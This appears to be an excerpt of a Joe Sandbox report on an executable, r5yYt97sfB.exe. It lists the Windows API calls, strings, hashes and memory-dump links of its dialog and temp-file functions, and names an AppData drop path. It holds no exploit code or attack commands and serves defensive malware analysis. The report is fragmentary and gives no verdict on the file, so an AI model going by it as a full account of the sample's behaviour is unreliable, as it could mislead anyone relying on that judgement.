Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 80da3fb7de925908d89dc6e0e66abe912019b1009effaac14551dbb45b1ebe3e
Instruction ID: 2811e774c662cae59278f25d6ecae3b2a92cb5be3fe339fd2c15133e28e6e099
Opcode Fuzzy Hash: 80da3fb7de925908d89dc6e0e66abe912019b1009effaac14551dbb45b1ebe3e
Instruction Fuzzy Hash: D0B01231140300BFDA214F00DF09F057B21AB90700F10C034B344380F086711035EB4D

Function 0040427C Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000028,?,00000001,004040A8), ref: 0040428A

Memory Dump Source

Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 4fda07dd220d348ff9e627888b9912082cf8e79b7c773bcb1828ccca34d8a7b3
Instruction ID: 7863800e542b6cbc8ec812c2a21dbba0b6cde8a84852b126545aa60b8f7f929b
Opcode Fuzzy Hash: 4fda07dd220d348ff9e627888b9912082cf8e79b7c773bcb1828ccca34d8a7b3
Instruction Fuzzy Hash: 13B01235285A00FBDE214B00EE09F457E62F76CB01F008478B340240F0CAB300B1DF19

Function 00404269 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,00404041), ref: 00404273

Memory Dump Source

Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: c0b3a243f11644889afe8cb27eda9c0353b0d621d2840f40823c674b46be75ab
Instruction ID: 08295bde0fd8e02eb16c20732bdcb1eb6333efd9321479dd2e2322931d05c33c
Opcode Fuzzy Hash: c0b3a243f11644889afe8cb27eda9c0353b0d621d2840f40823c674b46be75ab
Instruction Fuzzy Hash: ADA001B6644500ABCE129F90EF49D0ABB72EBE4B02B518579A285900348A365961FB59

Non-executed Functions

Function 00404C5E Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404C76
GetDlgItem.USER32(?,00000408), ref: 00404C81
GlobalAlloc.KERNEL32(00000040,?), ref: 00404CCB
LoadBitmapW.USER32(0000006E), ref: 00404CDE
SetWindowLongW.USER32(?,000000FC,00405256), ref: 00404CF7
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D0B
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404D1D
SendMessageW.USER32(?,00001109,00000002), ref: 00404D33
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404D3F
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404D51
DeleteObject.GDI32(00000000), ref: 00404D54
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404D7F
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404D8B
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E21
SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404E4C
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E60
GetWindowLongW.USER32(?,000000F0), ref: 00404E8F
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404E9D
ShowWindow.USER32(?,00000005), ref: 00404EAE
SendMessageW.USER32(?,00000419,00000000,?), ref: 00404FAB
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00405010
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405025
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405049
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405069
ImageList_Destroy.COMCTL32(?), ref: 0040507E
GlobalFree.KERNEL32(?), ref: 0040508E
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405107
SendMessageW.USER32(?,00001102,?,?), ref: 004051B0
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004051BF
InvalidateRect.USER32(?,00000000,00000001), ref: 004051DF
ShowWindow.USER32(?,00000000), ref: 0040522D
GetDlgItem.USER32(?,000003FE), ref: 00405238
ShowWindow.USER32(00000000), ref: 0040523F

Strings

N, xrefs: 00404EE9
, xrefs: 00405217
M, xrefs: 00404E08

Memory Dump Source

Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 1638840714-813528018
Opcode ID: 8b7898f8f49f67d995be691c5ed78805e405c898658afbb61a3d1b4db651d7df
Instruction ID: 46f3c2dfcfe7d78df06ebec09318e15d32e2b04993d9507e8b01d99ed80ca2ca
Opcode Fuzzy Hash: 8b7898f8f49f67d995be691c5ed78805e405c898658afbb61a3d1b4db651d7df
Instruction Fuzzy Hash: CA026EB0A00209AFDF209F65DD45AAE7BB5FB44314F10817AF610BA2E1C7799E52CF58

Function 004046E2 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 275stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 00404731
SetWindowTextW.USER32(00000000,?), ref: 0040475B
SHBrowseForFolderW.SHELL32(?), ref: 0040480C
CoTaskMemFree.OLE32(00000000), ref: 00404817
lstrcmpiW.KERNEL32(: Completed,00423748,00000000,?,?), ref: 00404849
lstrcatW.KERNEL32(?,: Completed), ref: 00404855
SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404867

Part of subcall function 004058AC: GetDlgItemTextW.USER32(?,?,00000400,0040489E), ref: 004058BF

Part of subcall function 00406417: CharNextW.USER32(0040A230,*?|<>/":,00000000,"C:\Users\user\Desktop\r5yYt97sfB.exe",771B3420,C:\Users\user~1\AppData\Local\Temp\,00000000,00403391,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004035E2), ref: 0040647A
Part of subcall function 00406417: CharNextW.USER32(0040A230,0040A230,0040A230,00000000), ref: 00406489
Part of subcall function 00406417: CharNextW.USER32(0040A230,"C:\Users\user\Desktop\r5yYt97sfB.exe",771B3420,C:\Users\user~1\AppData\Local\Temp\,00000000,00403391,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004035E2), ref: 0040648E
Part of subcall function 00406417: CharPrevW.USER32(0040A230,0040A230,771B3420,C:\Users\user~1\AppData\Local\Temp\,00000000,00403391,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004035E2), ref: 004064A1

GetDiskFreeSpaceW.KERNEL32(00421718,?,?,0000040F,?,00421718,00421718,?,00000001,00421718,?,?,000003FB,?), ref: 0040492A
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404945

Part of subcall function 00404A9E: lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B3F
Part of subcall function 00404A9E: wsprintfW.USER32 ref: 00404B48
Part of subcall function 00404A9E: SetDlgItemTextW.USER32(?,00423748), ref: 00404B5B

Strings

H7B, xrefs: 004047DF
: Completed, xrefs: 00404843, 00404848, 00404853
C:\Users\user\AppData\Local\magmaet\clenched, xrefs: 00404832
A, xrefs: 00404805

Memory Dump Source

Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: : Completed$A$C:\Users\user\AppData\Local\magmaet\clenched$H7B
API String ID: 2624150263-3880493371
Opcode ID: 29b82d879f89b335d801dd70145edd0b5915db95dd8f44cbea82b22297ec7ec8
Instruction ID: 9c6f5067bad78934a321292c7affeb857c6c8b78ef178650078e6910c23b8850
Opcode Fuzzy Hash: 29b82d879f89b335d801dd70145edd0b5915db95dd8f44cbea82b22297ec7ec8
Instruction Fuzzy Hash: D8A183F1A00208ABDF11AFA5CD45AAFB7B8EF84314F10843BF611B62D1D77C99418B69

Function 004043E4 Relevance: 42.2, APIs: 20, Strings: 4, Instructions: 207windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404482
GetDlgItem.USER32(?,000003E8), ref: 00404496
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004044B3
GetSysColor.USER32(?), ref: 004044C4
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004044D2
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004044E0
lstrlenW.KERNEL32(?), ref: 004044E5
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004044F2
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404507
GetDlgItem.USER32(?,0000040A), ref: 00404560
SendMessageW.USER32(00000000), ref: 00404567
GetDlgItem.USER32(?,000003E8), ref: 00404592
SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004045D5
LoadCursorW.USER32(00000000,00007F02), ref: 004045E3
SetCursor.USER32(00000000), ref: 004045E6
ShellExecuteW.SHELL32(0000070B,open,00428200,00000000,00000000,00000001), ref: 004045FB
LoadCursorW.USER32(00000000,00007F00), ref: 00404607
SetCursor.USER32(00000000), ref: 0040460A
SendMessageW.USER32(00000111,00000001,00000000), ref: 00404639
SendMessageW.USER32(00000010,00000000,00000000), ref: 0040464B

Strings

open, xrefs: 004045F3
: Completed, xrefs: 004045C1
N, xrefs: 00404580
[C@, xrefs: 004045F0

Memory Dump Source

Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
String ID: : Completed$N$[C@$open
API String ID: 3615053054-3308546834
Opcode ID: f6016d8c67c9c4ff159701ca9c3d7a2502a484c18c0b7e2ffb0018dff941af02
Instruction ID: 197425fdc48522821a3d1a28f7e64f0f4dcf149373df3ed1280bb5b235060fa2
Opcode Fuzzy Hash: f6016d8c67c9c4ff159701ca9c3d7a2502a484c18c0b7e2ffb0018dff941af02
Instruction Fuzzy Hash: D471A4B1A00209FFDB109F60DD85E6A7B69FB84344F00453AFA05B62E0D7799D51CFA9

Function 00405EB2 Relevance: 31.6, APIs: 11, Strings: 7, Instructions: 131stringmemoryCOMMON

Download Yara Rule

APIs

lstrcpyW.KERNEL32(00426DE8,NUL,?,00000000,?,Error writing temporary file. Make sure your temp folder is valid.,00406045,?,?), ref: 00405EC1
CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,Error writing temporary file. Make sure your temp folder is valid.,00406045,?,?), ref: 00405EE5
GetShortPathNameW.KERNEL32(?,00426DE8,00000400), ref: 00405EEE

Part of subcall function 00405CBD: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405F9E,00000000,[Rename],00000000,00000000,00000000), ref: 00405CCD
Part of subcall function 00405CBD: lstrlenA.KERNEL32(00000000,?,00000000,00405F9E,00000000,[Rename],00000000,00000000,00000000), ref: 00405CFF

GetShortPathNameW.KERNEL32(uB,004275E8,00000400), ref: 00405F0B
wsprintfA.USER32 ref: 00405F29
GetFileSize.KERNEL32(00000000,00000000,004275E8,C0000000,00000004,004275E8,?), ref: 00405F64
GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405F73
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405FAB
SetFilePointer.KERNEL32(0040A5A8,00000000,00000000,00000000,00000000,004269E8,00000000,-0000000A,0040A5A8,00000000,[Rename],00000000,00000000,00000000), ref: 00406001
GlobalFree.KERNEL32(00000000), ref: 00406012
CloseHandle.KERNEL32(00000000), ref: 00406019

Part of subcall function 00405D58: GetFileAttributesW.KERNELBASE(00000003,00402E84,C:\Users\user\Desktop\r5yYt97sfB.exe,80000000,00000003), ref: 00405D5C
Part of subcall function 00405D58: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405D7E

Strings

%ls=%ls, xrefs: 00405F1F
uB, xrefs: 00405F07
uB, xrefs: 00405F00
mB, xrefs: 00405EB6
NUL, xrefs: 00405EBB
[Rename], xrefs: 00405F93, 00405FA5
Error writing temporary file. Make sure your temp folder is valid., xrefs: 00405EB2

Memory Dump Source

Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
String ID: %ls=%ls$Error writing temporary file. Make sure your temp folder is valid.$NUL$[Rename]$mB$uB$uB
API String ID: 222337774-3510403337
Opcode ID: e7382f7b8c26af6e0710f3cc174a3ede04313a00f8ed0edbfd428e2cb97c63d7
Instruction ID: e0a3a616164006467439f71a5ee21b177f06bf99c86c19659b49dd792d0ed9da
Opcode Fuzzy Hash: e7382f7b8c26af6e0710f3cc174a3ede04313a00f8ed0edbfd428e2cb97c63d7
Instruction Fuzzy Hash: 52312230241B157BD2206B618D09F6B3A5CEF85755F25003BFA42F62D2DA3CD9118ABD

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectW.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextW.USER32(00000000,00429260,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: bf2da2548cab59f56b9c29784a74930a17cbf9c8a4836dedd9ba629d6cbcfebe
Instruction ID: e4307af7b63af3c060521be2e9f36853b9854247f946bef182d968856dcca5c3
Opcode Fuzzy Hash: bf2da2548cab59f56b9c29784a74930a17cbf9c8a4836dedd9ba629d6cbcfebe
Instruction Fuzzy Hash: BB418B71800209AFCF058FA5DE459AFBBB9FF45310F00842EF991AA1A0C738DA55DFA4

Function 00406417 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextW.USER32(0040A230,*?|<>/":,00000000,"C:\Users\user\Desktop\r5yYt97sfB.exe",771B3420,C:\Users\user~1\AppData\Local\Temp\,00000000,00403391,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004035E2), ref: 0040647A
CharNextW.USER32(0040A230,0040A230,0040A230,00000000), ref: 00406489
CharNextW.USER32(0040A230,"C:\Users\user\Desktop\r5yYt97sfB.exe",771B3420,C:\Users\user~1\AppData\Local\Temp\,00000000,00403391,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004035E2), ref: 0040648E
CharPrevW.USER32(0040A230,0040A230,771B3420,C:\Users\user~1\AppData\Local\Temp\,00000000,00403391,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004035E2), ref: 004064A1

Strings

"C:\Users\user\Desktop\r5yYt97sfB.exe", xrefs: 0040645B
*?|<>/":, xrefs: 00406469
C:\Users\user~1\AppData\Local\Temp\, xrefs: 00406418

Memory Dump Source

Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\r5yYt97sfB.exe"$*?|<>/":$C:\Users\user~1\AppData\Local\Temp\
API String ID: 589700163-252668668
Opcode ID: 3926a558a1d5fac86b1a7f5ee3cbb5d374d5244e5857cfc5627c81e884b8420d
Instruction ID: 97757fea8cfc4e5e160e398f5921a23c68bb92f937fa9eb531f0d47839a376ba
Opcode Fuzzy Hash: 3926a558a1d5fac86b1a7f5ee3cbb5d374d5244e5857cfc5627c81e884b8420d
Instruction Fuzzy Hash: AE11941580171299DB307B189C80AB762F8EF94760F56843FED8AB32C0E77D5C9286BD

Function 004042AE Relevance: 12.1, APIs: 8, Instructions: 61COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 004042CB
GetSysColor.USER32(00000000), ref: 004042E7
SetTextColor.GDI32(?,00000000), ref: 004042F3
SetBkMode.GDI32(?,?), ref: 004042FF
GetSysColor.USER32(?), ref: 00404312
SetBkColor.GDI32(?,?), ref: 00404322
DeleteObject.GDI32(?), ref: 0040433C
CreateBrushIndirect.GDI32(?), ref: 00404346

Memory Dump Source

Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
